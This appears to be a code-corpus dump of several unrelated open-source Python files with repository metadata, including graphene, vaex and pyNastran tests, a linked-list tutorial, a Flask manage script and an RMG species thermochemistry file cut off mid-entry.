doubts.append(pos_of_images_to_detect[i])
doubts2.append(rec_of_images_to_detect[i])
print("Num of Scanned:{0}\nNum of TP:{1}\nNum of FN:{2}\n ".format(len(res),sum(res),len(res)-sum(res)))
return doubts,nonMaxSuppression(doubts2,0.1)
#return nonMaxSuppression(doubts,0.1)
'''
true_point=(0,0)
true_point_doubts=0
for x in range(0,gray.shape[0],40):
for y in range(0,gray.shape[1],40):
tmp_point_doubts=0
for doubt in doubts:
if(doubt[2]>=x>=doubt[0] and doubt[3]>=y>=doubt[1]):
tmp_point_doubts+=1
if(tmp_point_doubts>true_point_doubts):
true_point=(y,x)
true_point_doubts=tmp_point_doubts
return true_point
'''es_to_detect=[]
pos_of_images_to_detect=[]
rec_of_images_to_detect=[]
while(True):
if(w >=gray.shape[0]):
break
w=int(w*2)
h=int(h*2)
for r in range(0,gray.shape[0]-h+1,15):
for c in range(0,gray.shape[1]-w+1,15):
#TODO scalling feature instead of resising image
new = cv2.resize(gray[r:r+h,c:c+w],(28,28))
#new = preProcess(new,1.2)
#cv2.imshow('new',new)
#cv2.waitKey(0)
images_to_detect.append(new)
rec_of_images_to_detect.append((c,r,c+w,r+w)) #append postions not as row and colums
pos_of_images_to_detect.append((int(c+w/2),int(r+w/2))) #append postions not as row and colums
images_ii_to_detect = list(map(toII, images_to_detect))
res = sc.predict(images_ii_to_detect)
doubts2=[]
"""
| [
"[email protected]"
]
| |
eda7d59af2ae751d7b25d53cd82272fde7a20c7d | eb19175c18053e5d414b4f6442bdfd0f9f97e24d | /tests/contrib_django/test_converter.py | 8c04699773df54369df8be04d36665643a5f9a55 | [
"MIT"
]
| permissive | jhgg/graphene | 6c4c5a64b7b0f39c8f6b32d17f62e1c31ca03825 | 67904e8329de3d69fec8c82ba8c3b4fe598afa8e | refs/heads/master | 2020-12-25T21:23:22.556227 | 2015-10-15T19:56:40 | 2015-10-15T19:56:40 | 43,073,008 | 1 | 0 | null | 2015-09-24T14:47:19 | 2015-09-24T14:47:19 | null | UTF-8 | Python | false | false | 3,521 | py | from py.test import raises
from collections import namedtuple
from pytest import raises
import graphene
from graphene import relay
from graphene.contrib.django.converter import (
convert_django_field
)
from graphene.contrib.django.fields import (
ConnectionOrListField,
DjangoModelField
)
from django.db import models
from .models import Article, Reporter
def assert_conversion(django_field, graphene_field, *args):
field = django_field(*args, help_text='Custom Help Text')
graphene_type = convert_django_field(field)
assert isinstance(graphene_type, graphene_field)
assert graphene_type.description == 'Custom Help Text'
return graphene_type
def test_should_unknown_django_field_raise_exception():
with raises(Exception) as excinfo:
convert_django_field(None)
assert 'Don\'t know how to convert the Django field' in str(excinfo.value)
def test_should_date_convert_string():
assert_conversion(models.DateField, graphene.StringField)
def test_should_char_convert_string():
assert_conversion(models.CharField, graphene.StringField)
def test_should_text_convert_string():
assert_conversion(models.TextField, graphene.StringField)
def test_should_email_convert_string():
assert_conversion(models.EmailField, graphene.StringField)
def test_should_slug_convert_string():
assert_conversion(models.SlugField, graphene.StringField)
def test_should_url_convert_string():
assert_conversion(models.URLField, graphene.StringField)
def test_should_auto_convert_id():
assert_conversion(models.AutoField, graphene.IDField)
def test_should_positive_integer_convert_int():
assert_conversion(models.PositiveIntegerField, graphene.IntField)
def test_should_positive_small_convert_int():
assert_conversion(models.PositiveSmallIntegerField, graphene.IntField)
def test_should_small_integer_convert_int():
assert_conversion(models.SmallIntegerField, graphene.IntField)
def test_should_big_integer_convert_int():
assert_conversion(models.BigIntegerField, graphene.IntField)
def test_should_integer_convert_int():
assert_conversion(models.IntegerField, graphene.IntField)
def test_should_boolean_convert_boolean():
field = assert_conversion(models.BooleanField, graphene.BooleanField)
assert field.required is True
def test_should_nullboolean_convert_boolean():
field = assert_conversion(models.NullBooleanField, graphene.BooleanField)
assert field.required is False
def test_should_float_convert_float():
assert_conversion(models.FloatField, graphene.FloatField)
def test_should_manytomany_convert_connectionorlist():
graphene_type = convert_django_field(Reporter._meta.local_many_to_many[0])
assert isinstance(graphene_type, ConnectionOrListField)
assert isinstance(graphene_type.field_type, DjangoModelField)
assert graphene_type.field_type.model == Reporter
def test_should_manytoone_convert_connectionorlist():
graphene_type = convert_django_field(Reporter.articles.related)
assert isinstance(graphene_type, ConnectionOrListField)
assert isinstance(graphene_type.field_type, DjangoModelField)
assert graphene_type.field_type.model == Article
def test_should_onetoone_convert_model():
field = assert_conversion(models.OneToOneField, DjangoModelField, Article)
assert field.model == Article
def test_should_foreignkey_convert_model():
field = assert_conversion(models.ForeignKey, DjangoModelField, Article)
assert field.model == Article
| [
"[email protected]"
]
| |
2f961ffd53ac5c591c95cfb96f730b5bb45915e4 | 133e8c9df1d1725d7d34ea4317ae3a15e26e6c66 | /python/数据结构与算法/02链表/单链表.py | 9acd2da0cfb6f8e8a747ab11e1d4d6a83f289443 | [
"Apache-2.0"
]
| permissive | 425776024/Learn | dfa8b53233f019b77b7537cc340fce2a81ff4c3b | 3990e75b469225ba7b430539ef9a16abe89eb863 | refs/heads/master | 2022-12-01T06:46:49.674609 | 2020-06-01T08:17:08 | 2020-06-01T08:17:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,886 | py | # -*- coding: utf-8 -*-
class Node(object):
def __init__(self, value=None, next=None):
# 这里我们 root 节点默认都是 None,所以都给了默认值
self.value = value # 值
self.next = next # 链接域, 指针
def __str__(self):
"""方便你打出来调试,复杂的代码可能需要断点调试"""
return '<Node: value: {}, next={}>'.format(self.value, self.next.value)
__repr__ = __str__
class LinkedList(object):
'''实现一个单向链表.'''
def __init__(self):
''' 初始化链表: 初始化时,为一个空链表.链表有两个标示head和tail都赋值None.'''
self.head = None
self.tail = None
def append(self, data):
'''
向链表新增元素:
1. 如果该链表是一个空链表,则链表head和tail都指向传进来的node节点.
2. 如果链表非空,则self.tail.next = node.next 指向新插入元素.
3. tail指向新插入的元素节点.
'''
node = Node(data)
if self.head is None:
self.head = node
self.tail = node
else:
self.tail.next = node
self.tail = node
def insert(self, index, value):
'''向链表插入一个元素node.
1. 从链表头开始遍历链表,当查找的index小于要插入索引的位置时,依次
指向下一个元素节点.直到找到要插入节点的索引位置.
2. 首先将插入的值,通过Node类实例化一个元素node.然后将它的next指针
指向它的下一个元素.即当前新元素节点之前的元素索引位置.
3. 将当前元素索引指向新插入元素node.
'''
cur = self.head
node = Node(value)
if index == 0:
node.next = self.head
if self.head is None:
self.tail = node
self.head = node
return
cur_index = 0
while cur_index < index - 1:
cur = cur.next
if cur.next is None:
raise Exception('list length less than index')
cur_index += 1
node.next = cur.next
cur.next = node
if cur.next is None:
self.tail = node
def remove(self, index):
'''从链表中删除一个元素节点.
1. 首先找到要删除的元素节点索引.
2. 然后将当前节点的next指向下一个下一个元素节点.
'''
cur = self.head
cur_index = 0
while cur_index < index-1:
cur = cur.next
if cur is None:
raise Exception('list length less than index')
cur_index +=1
cur.next = cur.next.next
if cur.next is None:
self.tail = cur
def removeEle(self, value):
""" 从链表中删除一个值
"""
cur = self.head
head = None
while cur is not None:
if cur.value == value:
if cur is self.head:
_head = cur.next
self.head = _head
if _head is self.tail:
self.tail = _head
del cur
return True
if cur is self.tail:
head.next = None
self.tail = head
del cur
return True
head.next = cur.next
del cur
return True
head = cur
cur = cur.next
return False
def iter(self):
'''
返回一个链表迭代器.
1. 首先判断该链表是否为一个空链表。如果时一个空链表,直接返回.
2. 如果是一个非空链表,首先指针指向head节点,然后将head节点data
返回.然后while循环,条件是下一个指针元素为真.然后弹出下一个元
素data,直到遍历到最后一个元素.
'''
if not self.head:
return
cur = self.head
yield cur.value
while cur.next:
cur = cur.next
yield cur.value
def __iter__(self):
for i in self.iter():
yield i
if __name__ == "__main__":
linked_list = LinkedList()
# 循环插入元素
for i in range(10):
linked_list.append(i)
# 向元素插入一个元素
linked_list.insert(0, 40)
# 向元素删除一个元素
linked_list.remove(4)
linked_list.removeEle(6)
# 遍历该链表
# for node in linked_list.iter():
# print node
# 遍历该链表
for node in linked_list:
print node
| [
"[email protected]"
]
| |
116cc3115d4ac2f1294d91646a2ab68c1d360cde | eff7a4a914e912eef2bc7a480795cfaae95eac91 | /python/Exercicios/8.16/8.16v2.py | 357d73983e83043c3f6a648ce289af847d27c6f8 | []
| no_license | HenDGS/Aprendendo-Python | fb3cf05d8911a7084c7805a69b8df06f9ce3d311 | 622a83983f3f77e5e74411e016663f05449be537 | refs/heads/master | 2023-08-17T14:17:53.304676 | 2021-09-14T02:51:52 | 2021-09-14T02:51:52 | 294,150,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | import funcao
a=funcao.funcao("camaro","Chevrolet",ano=2015,porência=461)
print(a)
| [
"[email protected]"
]
| |
719ec5e11dce6e24bd6b5f91b3469b407c0160a1 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02257/s888628284.py | 59550bf214754874e7673f5cf26d7edf5cc0ca07 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | # -*- coding: utf-8 -*-
def isPrime(p):
if p == 2:
return True
elif p < 2 or p%2 == 0:
return False
elif pow(2, p-1, p) == 1:
return True
else:
return False
n = int(raw_input())
count = 0
for i in range(n):
if isPrime(int(raw_input())):
count += 1
print count | [
"[email protected]"
]
| |
ed222c561a8364dd729c7da79f866fc6f3032907 | 8419f7d24df69a2cb92f04d7369c11c8141b0fcd | /tests/selection_test.py | 50d2e7a9e5f36e1495360ba5839de57cc89d17e9 | [
"MIT"
]
| permissive | heyuqi1970/vaex | c1768eac9d5126e7efd1e139522feb9d65a7ecc9 | 867c180427a23e3b71df47305d7e8866b6673a98 | refs/heads/master | 2021-07-09T08:45:21.634354 | 2020-04-23T17:23:58 | 2020-04-23T17:23:58 | 242,555,084 | 2 | 0 | MIT | 2020-04-24T03:40:17 | 2020-02-23T16:54:13 | Python | UTF-8 | Python | false | false | 6,325 | py | from common import *
def test_selection_basics(df):
total = df["x"].sum()
df.select("x > 5")
df.select("x <= 5", name="inverse")
counts = df.count("x", selection=["default", "inverse", "x > 5", "default | inverse"])
np.testing.assert_array_almost_equal(counts, [4, 6, 4, 10])
df.select("x <= 1", name="inverse", mode="subtract")
counts = df.count("x", selection=["default", "inverse"])
np.testing.assert_array_almost_equal(counts, [4, 4])
total_subset = df["x"].sum(selection=True)
assert total_subset < total
for mode in vaex.selections._select_functions.keys():
df.select("x > 5")
df.select("x > 5", mode)
df.select(None)
df.select("x > 5", mode)
df.select("x > 5")
total_subset = df["x"].sum(selection=True)
df.select_inverse()
total_subset_inverse = df["x"].sum(selection=True)
df.select("x <= 5")
total_subset_inverse_compare = df["x"].sum(selection=True)
assert total_subset_inverse == total_subset_inverse_compare
assert total_subset_inverse + total_subset == total
df.select("x > 5")
df.select("x <= 5", name="inverse")
df.select_inverse(name="inverse")
counts = df.count("x", selection=["default", "inverse"])
np.testing.assert_array_almost_equal(counts, [4, 4])
def test_selection_history(df):
assert not df.has_selection()
assert not df.selection_can_undo()
assert not df.selection_can_redo()
df.select_nothing()
assert not df.has_selection()
assert not df.selection_can_undo()
assert not df.selection_can_redo()
total = df["x"].sum()
assert not df.has_selection()
assert not df.selection_can_undo()
assert not df.selection_can_redo()
df.select("x > 5")
assert df.has_selection()
total_subset = df["x"].sum(selection=True)
assert total_subset < total
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.select("x < 7", mode="and")
total_subset2 = df["x"].sum(selection=True)
assert total_subset2 < total_subset
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.selection_undo()
total_subset_same = df["x"].sum(selection=True)
total_subset == total_subset_same
assert df.selection_can_undo()
assert df.selection_can_redo()
df.selection_redo()
total_subset2_same = df["x"].sum(selection=True)
total_subset2 == total_subset2_same
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.selection_undo()
df.selection_undo()
assert not df.has_selection()
assert not df.selection_can_undo()
assert df.selection_can_redo()
df.selection_redo()
assert df.has_selection()
assert df.selection_can_undo()
assert df.selection_can_redo()
df.select("x < 7", mode="and")
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.select_nothing()
assert not df.has_selection()
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.selection_undo()
assert df.selection_can_undo()
assert df.selection_can_redo()
def test_selection_serialize(df):
selection_expression = vaex.selections.SelectionExpression("x > 5", None, "and")
df.set_selection(selection_expression)
total_subset = df["x"].sum(selection=True)
df.select("x > 5")
total_subset_same = df["x"].sum(selection=True)
assert total_subset == total_subset_same
values = selection_expression.to_dict()
df.set_selection(vaex.selections.selection_from_dict(values))
total_subset_same2 = df["x"].sum(selection=True)
assert total_subset == total_subset_same2
selection_expression = vaex.selections.SelectionExpression("x > 5", None, "and")
selection_lasso = vaex.selections.SelectionLasso("x", "y", [0, 10, 10, 0], [-1, -1, 100, 100], selection_expression, "and")
df.set_selection(selection_lasso)
total_2 = df.sum("x", selection=True)
assert total_2 == total_subset
def test_selection_and_filter():
x = np.arange(-10, 11, 1)
y = np.arange(21)
df = vaex.from_arrays(x=x, y=y)
df.select(df.x < 0)
selected_list = df.evaluate(df.x, selection=True).tolist()
df_filtered = df[df.x < 0]
filtered_list = df_filtered['x'].tolist()
assert filtered_list == selected_list
repr(df_filtered)
# make sure we can slice, and repr
df_sliced = df_filtered[:5]
repr(df_sliced)
def test_filter(df):
dff = df[df.x>4]
assert dff.x.tolist() == list(range(5,10))
# vaex can have filters 'grow'
dff_bigger = dff.filter(dff.x < 3, mode="or")
dff_bigger = dff_bigger.filter(dff_bigger.x >= 0, mode="and") # restore old filter (df_filtered)
assert dff_bigger.x.tolist() == list(range(3)) + list(range(5,10))
def test_filter_boolean_scalar_variable(df):
df = df[df.x>4]
assert df.x.tolist() == list(range(5,10))
df.add_variable("production", True)
df = df.filter("production", mode="or")
df = df[df.x>=0] # restore old filter (df_filtered)
df = df[df.x<10] # restore old filter (df_filtered)
assert df.x.tolist() == list(range(10))
def test_selection_with_filtered_df_invalid_data():
# Custom function to be applied to a filtered DataFrame
def custom_func(x):
assert 4 not in x; return x**2
df = vaex.from_arrays(x=np.arange(10))
df_filtered = df[df.x!=4]
df_filtered.add_function('custom_function', custom_func)
df_filtered['y'] = df_filtered.func.custom_function(df_filtered.x)
# assert df_filtered.y.tolist() == [0, 1, 4, 9, 25, 36, 49, 64, 81]
assert df_filtered.count(df_filtered.y, selection='y > 0') == 8
def test_lasso(df):
x = [-0.1, 5.1, 5.1, -0.1]
y = [-0.1, -0.1, 4.1, 4.1]
df.select_lasso("x", "y", x, y)
sumx, sumy = df.sum(["x", "y"], selection=True)
np.testing.assert_array_almost_equal(sumx, 0+1+2)
np.testing.assert_array_almost_equal(sumy, 0+1+4)
# now test with masked arrays, m ~= x
x = [8-0.1, 9+0.1, 9+0.1, 8-0.1]
y = [-0.1, -0.1, 1000, 1000]
if df.is_local():
df._invalidate_selection_cache()
df.select_lasso("m", "y", x, y)
sumx, sumy = df.sum(['m', 'y'], selection=True)
np.testing.assert_array_almost_equal(sumx, 8)
np.testing.assert_array_almost_equal(sumy, 8**2)
| [
"[email protected]"
]
| |
5c187cef52ac8e1006273cd22ea80940f0c1b7d1 | 485ba262357e10460c74482cd407003ac86886bb | /pyNastran/converters/openfoam/test_openfoam_gui.py | 0d93a5f9986ab459a658b741ae5694fddee65246 | []
| no_license | shangke00GitHub/pyNastran | 13202f3f504dca044755088971176a407622425b | c4509df6ef6c3291c005caada831b443feee734f | refs/heads/master | 2020-11-30T02:45:48.774507 | 2019-12-20T00:56:25 | 2019-12-20T00:56:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,090 | py | import os
import unittest
from cpylog import get_logger
import pyNastran
from pyNastran.gui.testing_methods import FakeGUIMethods
from pyNastran.converters.openfoam.block_mesh import read_block_mesh, mirror_block_mesh
from pyNastran.converters.openfoam.face_file import FaceFile
from pyNastran.converters.openfoam.openfoam_io import OpenFoamIO
from pyNastran.utils import check_path
PKG_PATH = pyNastran.__path__[0]
MODEL_PATH = os.path.join(PKG_PATH, 'converters', 'openfoam', 'models')
class OpenFoamGUI(OpenFoamIO, FakeGUIMethods):
def __init__(self):
FakeGUIMethods.__init__(self)
self.model = OpenFoamIO(self)
self.build_fmts(['openfoam_hex', 'openfoam_shell', 'openfoam_faces'], stop_on_failure=True)
class TestOpenFoamGUI(unittest.TestCase):
def test_openfoam_geometry_01(self):
"""tests the ascii three plugs model"""
log = get_logger(level='warning', encoding='utf-8')
geometry_filename = os.path.join(MODEL_PATH, 'SnakeRiverCanyon', 'system', 'blockMeshDict')
bdf_filename = os.path.join(MODEL_PATH, 'SnakeRiverCanyon', 'system', 'blockMeshDict.bdf')
face_filename = os.path.join(MODEL_PATH, 'SnakeRiverCanyon', 'system', 'faces')
check_path(geometry_filename, 'geometry_filename')
test = OpenFoamGUI()
test.log = log
test.on_load_geometry(geometry_filename, geometry_format='openfoam_shell', raise_error=True)
test.on_load_geometry(geometry_filename, geometry_format='openfoam_hex', raise_error=True)
os.remove('points.bdf')
#test.load_openfoam_geometry_faces(geometry_filename)
model = read_block_mesh(geometry_filename, log=log)
block_mesh_name_out = 'blockMeshDict.out'
model.write_block_mesh(
block_mesh_name_out=block_mesh_name_out, make_symmetry=False)
model.write_block_mesh(
block_mesh_name_out=block_mesh_name_out, make_symmetry=True)
model.write_bdf(bdf_filename, model.nodes, model.hexas)
mirror_block_mesh(geometry_filename, block_mesh_name_out)
os.remove(block_mesh_name_out)
#nodes, hexas, quads, inames, bcs
def test_openfoam_2(self):
point_filename = 'points'
with open(point_filename, 'w') as point_file:
point_file.write('0. 0. 0.\n')
face_filename = 'faces'
with open(face_filename, 'w') as face_file:
face_file.write('2\n')
face_file.write('\n')
face_file.write('3 1 2 3\n')
face_file.write('3 1 3 4\n')
log = get_logger(level='warning', encoding='utf-8')
#test = OpenFoamGUI()
#test.log = log
#test.load_openfoam_faces_geometry(face_filename)
faces = FaceFile(log=None, debug=False)
faces.read_face_file(face_filename)
faces.read_face_file(face_filename, ifaces_to_read=[1])
faces.read_face_file(face_filename, ifaces_to_read=[0, 1])
os.remove(point_filename)
os.remove(face_filename)
if __name__ == '__main__': # pragma: no cover
unittest.main()
| [
"[email protected]"
]
| |
1df490347f6ba150e4c18eda8adb09b65cfd0cbd | 7ca50753ed3ff4c6115f8be3de675c91631c382f | /manage.py | 8c8509f5ee95dfc01cb27aa14ab0dd2c753db751 | []
| no_license | harrywang/flask-tdd-docker | a63ca86062dc05ab99591ef4ce609d90868f6e77 | 2677c52ae8dba84695d032fd309ee864f7fb2521 | refs/heads/master | 2023-05-11T15:44:04.689565 | 2020-03-21T20:00:57 | 2020-03-21T20:00:57 | 248,801,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | # manage.py
import sys
from flask.cli import FlaskGroup
from project import create_app, db
from project.api.users.models import User
app = create_app()
cli = FlaskGroup(create_app=create_app)
@cli.command('recreate_db')
def recreate_db():
db.drop_all()
db.create_all()
db.session.commit()
@cli.command('seed_db')
def seed_db():
db.session.add(User(username='michael', email="[email protected]"))
db.session.add(User(username='michaelherman', email="[email protected]"))
db.session.commit()
if __name__ == '__main__':
cli()
| [
"[email protected]"
]
| |
ed2f46727aa6af253e2f0bda84ca29d56ea9a2af | 41fd80f9ccc72a17c2db16b7019312a87d3181e8 | /zhang_local/pdep/network4339_1.py | 52702a2b7fa8af0d6b888aed032edd7cb7a99807 | []
| no_license | aberdeendinius/n-heptane | 1510e6704d87283043357aec36317fdb4a2a0c34 | 1806622607f74495477ef3fd772908d94cff04d9 | refs/heads/master | 2020-05-26T02:06:49.084015 | 2019-07-01T15:12:44 | 2019-07-01T15:12:44 | 188,069,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,984 | py | species(
label = '[CH]C(=[CH])C([CH2])C(18883)',
structure = SMILES('[CH]C(=[CH])C([CH2])C'),
E0 = (739.718,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,1380,1390,370,380,2900,435,3120,650,792.5,1650,350,440,435,1725,510.927,510.939,510.946],'cm^-1')),
HinderedRotor(inertia=(0.289946,'amu*angstrom^2'), symmetry=1, barrier=(53.7133,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.289928,'amu*angstrom^2'), symmetry=1, barrier=(53.7135,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.289953,'amu*angstrom^2'), symmetry=1, barrier=(53.7128,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.289951,'amu*angstrom^2'), symmetry=1, barrier=(53.7141,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.04902,0.0582,-3.35514e-05,4.61057e-09,2.14951e-12,89079.6,26.026], Tmin=(100,'K'), Tmax=(1015.18,'K')), NASAPolynomial(coeffs=[11.0759,0.030956,-1.14174e-05,1.97523e-09,-1.32045e-13,86411.8,-25.6117], Tmin=(1015.18,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(739.718,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + longDistanceInteraction_noncyclic(CdCs-ST) + group(Cds-CdsHH) + radical(Isobutyl) + radical(Cds_P) + radical(AllylJ2_triplet)"""),
)
species(
label = 'C=CC(42)',
structure = SMILES('C=CC'),
E0 = (6.12372,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650],'cm^-1')),
HinderedRotor(inertia=(0.597443,'amu*angstrom^2'), symmetry=1, barrier=(13.7364,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (42.0797,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2218.31,'J/mol'), sigma=(4.982,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.30977,0.00827491,3.37717e-05,-4.3931e-08,1.58773e-11,767.476,9.64349], Tmin=(100,'K'), Tmax=(988,'K')), NASAPolynomial(coeffs=[5.41204,0.0172866,-6.51359e-06,1.20323e-09,-8.55924e-14,-503.177,-4.80153], Tmin=(988,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(6.12372,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(203.705,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsHH)"""),
)
species(
label = '[CH]=C=[CH](18734)',
structure = SMILES('[CH]=C=[CH]'),
E0 = (491.681,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([540,610,2055,239.877,511.233,1743.98,1746.51,1747.6,1753.44],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (38.048,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1737.73,'J/mol'), sigma=(4.1,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.766,0.0170203,-1.57568e-05,7.95984e-09,-1.4265e-12,59188.9,11.2142], Tmin=(100,'K'), Tmax=(1806.04,'K')), NASAPolynomial(coeffs=[4.81405,0.00509933,2.77647e-07,-2.23082e-10,1.96202e-14,59653.5,3.45727], Tmin=(1806.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(491.681,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(108.088,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cds-CdsHH) + group(Cds-CdsHH) + group(Cdd-CdsCds) + radical(C=C=CJ) + radical(C=C=CJ)"""),
)
species(
label = 'H(8)',
structure = SMILES('[H]'),
E0 = (211.805,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25474.2,-0.444973], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25474.2,-0.444973], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.805,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = '[CH]C(=[CH])C(=C)C(19687)',
structure = SMILES('[CH]C(=[CH])C(=C)C'),
E0 = (636.521,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,2800,2850,1350,1500,750,1050,1375,1000,325,375,415,465,420,450,1700,1750,2950,3100,1380,975,1025,1650,180,180,180],'cm^-1')),
HinderedRotor(inertia=(2.11706,'amu*angstrom^2'), symmetry=1, barrier=(48.6754,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.11657,'amu*angstrom^2'), symmetry=1, barrier=(48.6641,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.11677,'amu*angstrom^2'), symmetry=1, barrier=(48.6687,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (79.1198,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.895327,0.0606763,-4.09674e-05,9.40654e-09,1.0466e-12,76674.1,21.159], Tmin=(100,'K'), Tmax=(1031.13,'K')), NASAPolynomial(coeffs=[13.2617,0.0259733,-9.78747e-06,1.72745e-09,-1.17364e-13,73418.4,-42.3016], Tmin=(1031.13,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(636.521,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(295.164,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(AllylJ2_triplet) + radical(Cds_P)"""),
)
species(
label = '[CH](2815)',
structure = SMILES('[CH]'),
E0 = (585.033,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([4000],'cm^-1')),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (13.0186,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.1763,-0.00339736,5.29655e-06,-3.21799e-09,7.28313e-13,70356.4,-0.99239], Tmin=(100,'K'), Tmax=(1260.74,'K')), NASAPolynomial(coeffs=[3.26554,0.000229807,1.03509e-07,-7.93772e-12,-2.40435e-16,70527.4,3.38009], Tmin=(1260.74,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(585.033,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(108.088,'J/(mol*K)'), comment="""Thermo library: primaryThermoLibrary + radical(CJ3)"""),
)
species(
label = 'C#CC([CH2])C(5193)',
structure = SMILES('C#CC([CH2])C'),
E0 = (321.758,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,750,770,3400,2100,1380,1390,370,380,2900,435,2175,525,3000,3100,440,815,1455,1000],'cm^-1')),
HinderedRotor(inertia=(0.46208,'amu*angstrom^2'), symmetry=1, barrier=(10.6241,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0666038,'amu*angstrom^2'), symmetry=1, barrier=(83.0888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(3.60399,'amu*angstrom^2'), symmetry=1, barrier=(82.8629,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (67.1091,'amu'),
